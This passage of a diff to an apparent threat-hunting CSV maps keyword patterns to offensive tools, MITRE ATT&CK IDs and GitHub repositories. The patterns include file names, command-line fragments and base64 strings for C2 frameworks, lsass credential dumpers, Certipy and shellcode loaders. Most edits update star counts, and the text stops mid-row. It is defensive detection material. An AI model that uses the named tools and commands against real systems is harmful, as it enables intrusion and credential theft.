T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*LW8sLS1vcHRpb25z*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*LWIsLS1idWNrZXQ=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" @@ -13313,8 +13470,8 @@ "*LXAsLS1waWQ=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*LXAsLS1wYXlsb2Fk*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*LXUsLS11cmk=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*ly4k/Certipy*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","535","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" -"*ly4k/Certipy*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*ly4k/Certipy*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*ly4k/Certipy*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "*ly4k/PassTheChallenge*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*lyncsmash*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations","T1580 - T1201 - T1071 - T1110 - T1078","TA0043 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*lyncsmash.git*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" @@ -13322,25 +13479,25 @@ "*lyncsmash.py*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*lyncsmash-master*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*LyncSniper*","offensive_tool_keyword","LyncSniper","LyncSniper is a tool for penetration testing Lync and Skype for Business deployments hosted either on premise or in Office 365","T1566 - T1574 - T1210 - T1596","TA0002 - TA0011 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/LyncSniper","1","0","N/A","N/A","1","9","3","2017-04-11T08:38:28Z","2017-06-12T10:56:58Z" -"*-m * -d * -w * --top-web-ports*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" -"*-m dumpert *","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*-M handlekatz -o *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*-m * -d * -w * --top-web-ports*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*-m dumpert *","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*-M handlekatz -o *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*M.i.m.i.k.a.t.z*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*m00zh33/golang_c2*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*m0rv4i/SharpCookieMonster*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*m3f157O/combine_harvester*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" -"*m4ll0k/SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*m4ll0k/SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" "*MAAD_Attack.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*MAAD_Config.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*MAAD_Mitre_Map.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*MAADInitialization.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*mac.changer on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*mac_dirty_cow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*mac2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*mac2john-alt.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mac.changer on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*mac_dirty_cow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mac2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mac2john-alt.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*MaccaroniC2.git*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*macchanger -r*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" -"*MaceTrap.exe*","offensive_tool_keyword","macetrap","MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders","T1070.004","TA0040","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*MaceTrap.exe*","offensive_tool_keyword","macetrap","MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders","T1070.004","TA0040","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*machine1337/TelegramRAT*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" "*macro_pack*","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1566.001 - T1564.001 - T1564.003","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","1950","404","2022-05-12T13:30:29Z","2017-10-03T18:30:06Z" "*MacroDetectSandbox.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" @@ -13351,189 +13508,190 @@ "*Macrome.csproj*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome.dll*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome.sln*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" -"*MACshellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*MACshellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*MACshellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*MACshellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*MACshellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*MACshellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*MACshellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*MACshellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - 